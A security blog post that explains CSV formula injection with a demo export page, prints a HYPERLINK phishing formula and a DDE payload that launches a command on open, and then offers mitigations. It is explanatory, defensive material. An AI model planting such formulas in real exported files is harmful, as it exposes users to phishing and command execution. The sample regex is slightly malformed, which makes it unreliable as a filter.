Is that CSV Secure?

Defining CSV injection vulnerabilities

solution Is that CSV Secure?

December 22, 2017

Comma-Separated Values file (or CSV) is a type of file that stores tabular data, numbers and text in plain text. Each line of the file is a data record and each record consists of one or more fields separated by commas. CSV is a common data exchange format that is widely supported by consumer, business, and scientific applications. As an example, a user may need to transfer information from a database program that stores data in a proprietary format, to a spreadsheet that uses a completely different format. The database program most likely can export its data as "CSV"; the exported CSV file can then be imported by the spreadsheet program.


There is a vulnerability in this types of format that the most of programmers ignores, that is "CSV Injection". As OWASP says, it occurs when websites embed untrusted input inside CSV files, when a spreadsheet program is used to open a CSV file, any cell starting with '=' is considered as a formula and crafted formulas can be used to malicious attacks.

CSV Injection Example

We have a page that stores data on a table and exports it on a CSV file


We put some normal data and nothing happens



But what happens if we put a formula like =2+5 in a field?



On our table nothing happens, but when we open the CSV file we get the result of the formula that we introduced. This can be very dangerous if someone introduce a more dangerous code like

  =HYPERLINK(""&A3&"[CR]","Error fetching info: Click me to resolve.")

When the user open the file it shows a link with our malicious site


Also we can execute commands on the target with this formula injection, in where we open the calc when someone opens the CSV file

  =cmd|' /C calc'!A0

It shows some warnings but the user trust in the source of the file and accept



And then the code execution


The effectiveness of this vulnerability is that the user trust on the source of the file without asking himself if is the normal behaviour when someone opens a CSV file and the program asks form permission


  • First is user awareness, because Windows shows an alert when someone puts command execution code in the CSV file like we’ve seen

  • Second, input validation, the most common characters to do this attack are:


A developer could make a validation like this regex


var regexp = new RegExp(/([=,-,+,@])/g);

And blocking this types of input, also, can put a space between the dangerous character like ' =' to mitigate this vulnerability

  formData.sdata1 = " "+formData.sdata1
  formData.sdata2 = " "+formData.sdata2

In this example we can see that the spreadsheet program doesn’t calculate the formula and our input is secure



The source code of the page for testing can be found here


Subscribe to our blog

Sign up for Fluid Attacks’ weekly newsletter.

Recommended blog posts

You might be interested in the following related posts.

Photo by Saketh Upadhya on Unsplash

Get an overview of vulnerability assessment

Photo by Anchor Lee on Unsplash

Benefits of continuous over point-in-time pentesting

Photo by Nik Shuliahin on Unsplash

For which security standards is pentesting a must-have?

Photo by Thomas Griggs on Unsplash

Pentesting is a system-agnostic approach to security

Photo by sebastiaan stam on Unsplash

Injecting JS into one site is harmful, into all, lethal

Photo by Dmitry Ratushny on Unsplash

Differences between these security testing approaches

Photo by Kostiantyn Li on Unsplash

Our CLI is an approved AST tool to secure cloud apps

Photo by Jeff Lemond on Unsplash

How BAS solutions work, their importance and benefits

Start your 21-day free trial

Discover benefits of our Continuous Hacking solution, which hundreds of organizations are already enjoying.

Start your 21-day free trial